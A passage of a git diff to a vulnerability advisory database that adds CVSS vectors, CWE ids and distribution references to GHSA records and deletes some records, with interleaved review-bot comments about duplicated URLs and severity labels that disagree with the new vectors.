@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mj29-93c5-p3pr", - "modified": "2021-12-10T00:01:24Z", + "modified": "2024-02-04T09:30:31Z", "published": "2021-12-08T00:01:39Z", "aliases": [ "CVE-2021-28703" ], "details": "grant table v2 status pages may remain accessible after de-allocation (take two) Guest get permitted access to certain Xen-owned pages of memory. The majority of such pages remain allocated / associated with a guest for its entire lifetime. Grant table v2 status pages, however, get de-allocated when a guest switched (back) from v2 to v1. The freeing of such pages requires that the hypervisor know where in the guest these pages were mapped. The hypervisor tracks only one use within guest space, but racing requests from the guest to insert mappings of these pages may result in any of them to become mapped in multiple locations. Upon switching back from v2 to v1, the guest would then retain access to a page that was freed and perhaps re-used for other purposes. This bug was fortuitously fixed by code cleanup in Xen 4.14, and backported to security-supported Xen branches as a prerequisite of the fix for XSA-378.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -18,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28703" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://xenbits.xenproject.org/xsa/advisory-387.txt" diff --git a/advisories/unreviewed/2021/12/GHSA-w6cc-5mpf-4rmj/GHSA-w6cc-5mpf-4rmj.json b/advisories/unreviewed/2021/12/GHSA-w6cc-5mpf-4rmj/GHSA-w6cc-5mpf-4rmj.json index 08ea4f73e97cc..755b07625fa90 100644 --- a/advisories/unreviewed/2021/12/GHSA-w6cc-5mpf-4rmj/GHSA-w6cc-5mpf-4rmj.json +++ b/advisories/unreviewed/2021/12/GHSA-w6cc-5mpf-4rmj/GHSA-w6cc-5mpf-4rmj.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-w6cc-5mpf-4rmj", - "modified": "2021-12-04T00:01:10Z", + "modified": "2024-01-31T15:30:17Z", "published": "2021-12-03T00:00:27Z", "aliases": [ "CVE-2020-36129" ], "details": "AOM v2.0.1 was discovered to contain a stack buffer overflow via the component src/aom_image.c.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -21,6 +24,10 @@ { "type": "WEB", "url": "https://bugs.chromium.org/p/aomedia/issues/detail?id=2912&q=&can=1" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-32" } ], "database_specific": { diff --git a/advisories/unreviewed/2021/12/GHSA-w9vw-69gr-j5w3/GHSA-w9vw-69gr-j5w3.json b/advisories/unreviewed/2021/12/GHSA-w9vw-69gr-j5w3/GHSA-w9vw-69gr-j5w3.json index e15ced295503d..18afff9c71f5a 100644 --- a/advisories/unreviewed/2021/12/GHSA-w9vw-69gr-j5w3/GHSA-w9vw-69gr-j5w3.json +++ b/advisories/unreviewed/2021/12/GHSA-w9vw-69gr-j5w3/GHSA-w9vw-69gr-j5w3.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00003.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-32" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5490" diff --git a/advisories/unreviewed/2022/01/GHSA-cffq-m726-w77f/GHSA-cffq-m726-w77f.json b/advisories/unreviewed/2022/01/GHSA-cffq-m726-w77f/GHSA-cffq-m726-w77f.json index 80a8e013e61fe..328c49aef617e 100644 --- a/advisories/unreviewed/2022/01/GHSA-cffq-m726-w77f/GHSA-cffq-m726-w77f.json +++ b/advisories/unreviewed/2022/01/GHSA-cffq-m726-w77f/GHSA-cffq-m726-w77f.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-cffq-m726-w77f", - "modified": "2022-01-27T00:02:01Z", + "modified": "2024-02-03T03:30:26Z", "published": "2022-01-22T00:00:33Z", "aliases": [ "CVE-2021-40247" ], "details": "SQL injection vulnerability in Sourcecodester Budget and Expense Tracker System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username field.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/02/GHSA-fr63-458q-29q2/GHSA-fr63-458q-29q2.json b/advisories/unreviewed/2022/02/GHSA-fr63-458q-29q2/GHSA-fr63-458q-29q2.json index d8ade344b9b92..c8fa7c59f53d0 100644 --- a/advisories/unreviewed/2022/02/GHSA-fr63-458q-29q2/GHSA-fr63-458q-29q2.json +++ b/advisories/unreviewed/2022/02/GHSA-fr63-458q-29q2/GHSA-fr63-458q-29q2.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fr63-458q-29q2", - "modified": "2022-02-10T00:00:50Z", + "modified": "2024-02-02T18:30:23Z", "published": "2022-02-10T00:00:50Z", "aliases": [ "CVE-2021-45429" ], "details": "A Buffer Overflow vulnerablity exists in VirusTotal YARA git commit: 605b2edf07ed8eb9a2c61ba22eb2e7c362f47ba7 via yr_set_configuration in yara/libyara/libyara.c, which could cause a Denial of Service.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/03/GHSA-2mgj-mwvf-mpg5/GHSA-2mgj-mwvf-mpg5.json b/advisories/unreviewed/2022/03/GHSA-2mgj-mwvf-mpg5/GHSA-2mgj-mwvf-mpg5.json deleted file mode 100644 index c05342f7c3f21..0000000000000 --- a/advisories/unreviewed/2022/03/GHSA-2mgj-mwvf-mpg5/GHSA-2mgj-mwvf-mpg5.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-2mgj-mwvf-mpg5", - "modified": "2022-04-05T00:00:38Z", - "published": "2022-03-30T00:00:24Z", - "aliases": [ - "CVE-2022-28144" - ], - "details": "Jenkins Proxmox Plugin 0.7.0 and earlier does not perform a permission check in several HTTP endpoints, allowing attackers with Overall/Read permission to connect to an attacker-specified host using attacker-specified username and password (perform a connection test), disable SSL/TLS validation for the entire Jenkins controller JVM as part of the connection test (see CVE-2022-28142), and test a rollback with attacker-specified parameters.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28144" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-2082" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2022/03/29/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2022-03-29T13:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/03/GHSA-m9gv-4523-jffm/GHSA-m9gv-4523-jffm.json b/advisories/unreviewed/2022/03/GHSA-m9gv-4523-jffm/GHSA-m9gv-4523-jffm.json deleted file mode 100644 index 9fc2f56b50c58..0000000000000 --- a/advisories/unreviewed/2022/03/GHSA-m9gv-4523-jffm/GHSA-m9gv-4523-jffm.json +++ /dev/null 
@@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-m9gv-4523-jffm", - "modified": "2022-03-23T00:00:43Z", - "published": "2022-03-16T00:00:44Z", - "aliases": [ - "CVE-2022-27199" - ], - "details": "A missing permission check in Jenkins CloudBees AWS Credentials Plugin 189.v3551d5642995 and earlier allows attackers with Overall/Read permission to connect to an AWS service using an attacker-specified token.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27199" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2022-03-15/#SECURITY-2351" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2022/03/15/2" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-276", - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2022-03-15T17:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/03/GHSA-mxm3-g2j6-276p/GHSA-mxm3-g2j6-276p.json b/advisories/unreviewed/2022/03/GHSA-mxm3-g2j6-276p/GHSA-mxm3-g2j6-276p.json index 3fcb8b25cdee6..598adb6250bf1 100644 --- a/advisories/unreviewed/2022/03/GHSA-mxm3-g2j6-276p/GHSA-mxm3-g2j6-276p.json +++ b/advisories/unreviewed/2022/03/GHSA-mxm3-g2j6-276p/GHSA-mxm3-g2j6-276p.json 
@@ -29,6 +29,18 @@
 "type": "WEB",
 "url": "https://lists.debian.org/nbd/2022/01/msg00037.html"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2UPX62BIWOOHSACGUDB7E3O4URNN37F/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IZHR73XMAJTCFGKUZRXVTZKCK2X3IFNA/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PU5JFD4PEJED72TZLZ5R2Q2SFXICU5I5/"
+ },
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/G2UPX62BIWOOHSACGUDB7E3O4URNN37F/"
@@ -41,6 +53,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PU5JFD4PEJED72TZLZ5R2Q2SFXICU5I5/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-10"
+ },
 {
 "type": "WEB",
 "url": "https://sourceforge.net/projects/nbd/files/nbd/"
diff --git a/advisories/unreviewed/2022/03/GHSA-q9rw-8758-hccj/GHSA-q9rw-8758-hccj.json b/advisories/unreviewed/2022/03/GHSA-q9rw-8758-hccj/GHSA-q9rw-8758-hccj.json
index d6439fa7cd88a..0bd6f72f12766 100644
--- a/advisories/unreviewed/2022/03/GHSA-q9rw-8758-hccj/GHSA-q9rw-8758-hccj.json
+++ b/advisories/unreviewed/2022/03/GHSA-q9rw-8758-hccj/GHSA-q9rw-8758-hccj.json
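Review bot: The three Fedora list references added in the `@@ -29,6 +29,18 @@` hunk of GHSA-mxm3-g2j6-276p appear to be the same three messages as the `package-announce@lists.fedoraproject.org` entries that immediately follow them, differing only in `@` being written as `%40`, so the advisory now lists each reference twice. If the importer decides an entry is new by exact string comparison, it should normalize the URL (at least decode `%40` and compare case-insensitively on the host) before appending, otherwise every upstream feed that emits both spellings will keep growing these arrays. The same duplicate pair is introduced in the GHSA-q9rw-8758-hccj hunk and in the GHSA-5j4q-p8r9-g32c hunk further down. Consumers that count or deduplicate references by URL will see inconsistent sets across otherwise identical advisories.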
@@ -29,6 +29,18 @@ "type": "WEB", "url": "https://lists.debian.org/nbd/2022/01/msg00037.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2UPX62BIWOOHSACGUDB7E3O4URNN37F/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IZHR73XMAJTCFGKUZRXVTZKCK2X3IFNA/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PU5JFD4PEJED72TZLZ5R2Q2SFXICU5I5/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/G2UPX62BIWOOHSACGUDB7E3O4URNN37F/" @@ -41,6 +53,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PU5JFD4PEJED72TZLZ5R2Q2SFXICU5I5/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-10" + }, { "type": "WEB", "url": "https://sourceforge.net/projects/nbd/files/nbd/" diff --git a/advisories/unreviewed/2022/03/GHSA-wjvr-2hjg-6rhj/GHSA-wjvr-2hjg-6rhj.json b/advisories/unreviewed/2022/03/GHSA-wjvr-2hjg-6rhj/GHSA-wjvr-2hjg-6rhj.json deleted file mode 100644 index 5e859f4b18974..0000000000000 --- a/advisories/unreviewed/2022/03/GHSA-wjvr-2hjg-6rhj/GHSA-wjvr-2hjg-6rhj.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wjvr-2hjg-6rhj", - "modified": "2022-04-05T00:00:39Z", - "published": "2022-03-30T00:00:24Z", - "aliases": [ - "CVE-2022-28143" - ], - "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins Proxmox Plugin 0.7.0 and earlier allows attackers to connect to an attacker-specified host using attacker-specified username and password (perform a connection test), disable SSL/TLS validation for the entire Jenkins controller JVM as part of the connection test (see CVE-2022-28142), and test a rollback with attacker-specified parameters.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28143" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-2082" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2022/03/29/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2022-03-29T13:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-28q9-rp4x-j7g7/GHSA-28q9-rp4x-j7g7.json b/advisories/unreviewed/2022/04/GHSA-28q9-rp4x-j7g7/GHSA-28q9-rp4x-j7g7.json index 281bc99854d9b..922c25e3f7788 100644 --- a/advisories/unreviewed/2022/04/GHSA-28q9-rp4x-j7g7/GHSA-28q9-rp4x-j7g7.json +++ b/advisories/unreviewed/2022/04/GHSA-28q9-rp4x-j7g7/GHSA-28q9-rp4x-j7g7.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-28q9-rp4x-j7g7", - "modified": "2022-04-29T01:27:11Z", + "modified": "2024-02-02T15:30:25Z", "published": "2022-04-29T01:27:11Z", "aliases": [ "CVE-2003-0899" ], "details": "Buffer overflow in defang in libhttpd.c for thttpd 2.21 to 2.23b1 allows remote attackers to execute arbitrary code via requests that contain '<' or '>' characters, which trigger the overflow when the characters are expanded to \"<\" and \">\" sequences.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -49,7 +52,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-131" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-2cgm-mxqq-wprv/GHSA-2cgm-mxqq-wprv.json b/advisories/unreviewed/2022/04/GHSA-2cgm-mxqq-wprv/GHSA-2cgm-mxqq-wprv.json index be88494ba393b..50bba2e28e229 100644 --- a/advisories/unreviewed/2022/04/GHSA-2cgm-mxqq-wprv/GHSA-2cgm-mxqq-wprv.json +++ b/advisories/unreviewed/2022/04/GHSA-2cgm-mxqq-wprv/GHSA-2cgm-mxqq-wprv.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2cgm-mxqq-wprv", - "modified": "2022-04-29T03:00:36Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-29T03:00:36Z", "aliases": [ "CVE-2004-1995" ], "details": "Cross-Site Request Forgery (CSRF) vulnerability in FuseTalk 2.0 allows remote attackers to create arbitrary accounts via a link to adduser.cfm.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -45,7 +48,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-352" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-2j2f-h2gf-6r4c/GHSA-2j2f-h2gf-6r4c.json b/advisories/unreviewed/2022/04/GHSA-2j2f-h2gf-6r4c/GHSA-2j2f-h2gf-6r4c.json index 5be52399d3d50..9bf479a4e5bb7 100644 
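Review bot: The CVSS 3.1 vector added to GHSA-28q9-rp4x-j7g7 (`AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`, base score 9.8) sits next to an unchanged `"severity": "HIGH"` in `database_specific`, which under the usual 9.0–10.0 = CRITICAL banding no longer agrees with the vector. The opposite mismatch appears in GHSA-2cgm-mxqq-wprv on the same line, where `AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N` scores 6.5 (MODERATE) but the label stays `"HIGH"`, and the disagreement recurs in most advisories in this range that gain a vector (the 9.8 vectors in GHSA-2j2f-h2gf-6r4c, GHSA-3vgv-pgwc-8f57, GHSA-69rx-rcww-qf58, GHSA-6m44-c224-92xx, GHSA-746g-hg8c-j9cg and GHSA-7rhp-mjch-qq88 keep `"HIGH"`; the 5.5 vectors in GHSA-4rm4-8m7j-xwx3, GHSA-55c6-r3wh-x7cj and GHSA-7hcc-g6hm-h786 keep `"LOW"`). If `database_specific.severity` is meant to be derived from the CVSS score, the sync should recompute it in the same change that adds the vector; if it intentionally comes from a different source (an older v2 rating, presumably), that provenance should be recorded where consumers can see it, because a tool that filters on the label and one that filters on the vector will now disagree on these records.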
--- a/advisories/unreviewed/2022/04/GHSA-2j2f-h2gf-6r4c/GHSA-2j2f-h2gf-6r4c.json +++ b/advisories/unreviewed/2022/04/GHSA-2j2f-h2gf-6r4c/GHSA-2j2f-h2gf-6r4c.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2j2f-h2gf-6r4c", - "modified": "2022-04-29T03:01:00Z", + "modified": "2024-02-08T03:32:44Z", "published": "2022-04-29T03:01:00Z", "aliases": [ "CVE-2004-2214" ], "details": "Mbedthis AppWeb HTTP server before 1.1.3 allows remote attackers to bypass access restrictions via a URI with mixed case characters.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-178" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-2wm2-cfr8-8vw9/GHSA-2wm2-cfr8-8vw9.json b/advisories/unreviewed/2022/04/GHSA-2wm2-cfr8-8vw9/GHSA-2wm2-cfr8-8vw9.json index 80b2c5ea5d70b..df2d2629e58d7 100644 --- a/advisories/unreviewed/2022/04/GHSA-2wm2-cfr8-8vw9/GHSA-2wm2-cfr8-8vw9.json +++ b/advisories/unreviewed/2022/04/GHSA-2wm2-cfr8-8vw9/GHSA-2wm2-cfr8-8vw9.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2wm2-cfr8-8vw9", - "modified": "2022-04-29T02:58:46Z", + "modified": "2024-02-08T18:30:37Z", "published": "2022-04-29T02:58:46Z", "aliases": [ "CVE-2004-1002" ], "details": "Integer underflow in pppd in cbcp.c for ppp 2.4.1 allows remote attackers to cause a denial of service (daemon crash) via a CBCP packet with an invalid length value that causes pppd to access an incorrect memory location.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-191" ], "severity": "MODERATE", "github_reviewed": false, 
diff --git a/advisories/unreviewed/2022/04/GHSA-3276-p9f2-8q89/GHSA-3276-p9f2-8q89.json b/advisories/unreviewed/2022/04/GHSA-3276-p9f2-8q89/GHSA-3276-p9f2-8q89.json deleted file mode 100644 index aa05c68bf23f7..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-3276-p9f2-8q89/GHSA-3276-p9f2-8q89.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-3276-p9f2-8q89", - "modified": "2022-04-21T01:57:47Z", - "published": "2022-04-21T01:57:47Z", - "aliases": [ - "CVE-2010-3670" - ], - "details": "TYPO3 before 4.3.4 and 4.4.x before 4.4.1 contains insecure randomness during generation of a hash with the \"forgot password\" function.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3670" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2010-3670" - }, - { - "type": "WEB", - "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Insecure_Randomness" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-11-05T20:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-3mf3-33v4-jcj2/GHSA-3mf3-33v4-jcj2.json b/advisories/unreviewed/2022/04/GHSA-3mf3-33v4-jcj2/GHSA-3mf3-33v4-jcj2.json index 3be78d89820b2..7461581c57227 100644 --- a/advisories/unreviewed/2022/04/GHSA-3mf3-33v4-jcj2/GHSA-3mf3-33v4-jcj2.json +++ b/advisories/unreviewed/2022/04/GHSA-3mf3-33v4-jcj2/GHSA-3mf3-33v4-jcj2.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3mf3-33v4-jcj2", - "modified": "2022-04-30T18:21:53Z", + "modified": "2024-02-08T21:30:29Z", "published": "2022-04-30T18:21:53Z", "aliases": [ "CVE-2002-1796" ], "details": "ChaiVM EZloader for HP color LaserJet 4500 and 4550 and HP LaserJet 4100 and 8150 does not properly verify JAR signatures for new services, which allows local users to load unauthorized Chai services.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-347" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-3vgv-pgwc-8f57/GHSA-3vgv-pgwc-8f57.json b/advisories/unreviewed/2022/04/GHSA-3vgv-pgwc-8f57/GHSA-3vgv-pgwc-8f57.json index 6be970a664683..aff4681ac55bf 100644 --- a/advisories/unreviewed/2022/04/GHSA-3vgv-pgwc-8f57/GHSA-3vgv-pgwc-8f57.json +++ b/advisories/unreviewed/2022/04/GHSA-3vgv-pgwc-8f57/GHSA-3vgv-pgwc-8f57.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3vgv-pgwc-8f57", - "modified": "2022-04-30T18:16:41Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-04-30T18:16:41Z", "aliases": [ "CVE-2001-0766" ], "details": "Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-178" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-48ww-8h7g-4hwq/GHSA-48ww-8h7g-4hwq.json b/advisories/unreviewed/2022/04/GHSA-48ww-8h7g-4hwq/GHSA-48ww-8h7g-4hwq.json deleted file mode 100644 index 48769bc6d9d1e..0000000000000 
--- a/advisories/unreviewed/2022/04/GHSA-48ww-8h7g-4hwq/GHSA-48ww-8h7g-4hwq.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-48ww-8h7g-4hwq", - "modified": "2022-04-21T01:57:47Z", - "published": "2022-04-21T01:57:47Z", - "aliases": [ - "CVE-2010-3667" - ], - "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows Spam Abuse in the native form content element.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3667" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2010-3667" - }, - { - "type": "WEB", - "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Spam_Abuse" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-11-04T22:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-4rm4-8m7j-xwx3/GHSA-4rm4-8m7j-xwx3.json b/advisories/unreviewed/2022/04/GHSA-4rm4-8m7j-xwx3/GHSA-4rm4-8m7j-xwx3.json index b358416418ba3..c214ff89ecf84 100644 --- a/advisories/unreviewed/2022/04/GHSA-4rm4-8m7j-xwx3/GHSA-4rm4-8m7j-xwx3.json +++ b/advisories/unreviewed/2022/04/GHSA-4rm4-8m7j-xwx3/GHSA-4rm4-8m7j-xwx3.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4rm4-8m7j-xwx3", - "modified": "2022-04-30T18:22:07Z", + "modified": "2024-02-08T21:30:29Z", "published": "2022-04-30T18:22:07Z", "aliases": [ "CVE-2002-1915" ], "details": "tip on multiple BSD-based operating systems allows local users to cause a denial of service (execution prevention) by using flock() to lock the /var/log/acculog file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ 
@@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-667" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-4rvc-5hrh-qmwf/GHSA-4rvc-5hrh-qmwf.json b/advisories/unreviewed/2022/04/GHSA-4rvc-5hrh-qmwf/GHSA-4rvc-5hrh-qmwf.json deleted file mode 100644 index 148d372669e66..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-4rvc-5hrh-qmwf/GHSA-4rvc-5hrh-qmwf.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-4rvc-5hrh-qmwf", - "modified": "2022-04-21T01:57:46Z", - "published": "2022-04-21T01:57:46Z", - "aliases": [ - "CVE-2010-3662" - ], - "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows SQL Injection on the backend.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3662" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2010-3662" - }, - { - "type": "WEB", - "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#SQL_Injection" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-11-04T22:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-5337-f6v6-75gf/GHSA-5337-f6v6-75gf.json b/advisories/unreviewed/2022/04/GHSA-5337-f6v6-75gf/GHSA-5337-f6v6-75gf.json index 43b0095bafea6..1759897da2d50 100644 --- a/advisories/unreviewed/2022/04/GHSA-5337-f6v6-75gf/GHSA-5337-f6v6-75gf.json +++ b/advisories/unreviewed/2022/04/GHSA-5337-f6v6-75gf/GHSA-5337-f6v6-75gf.json 
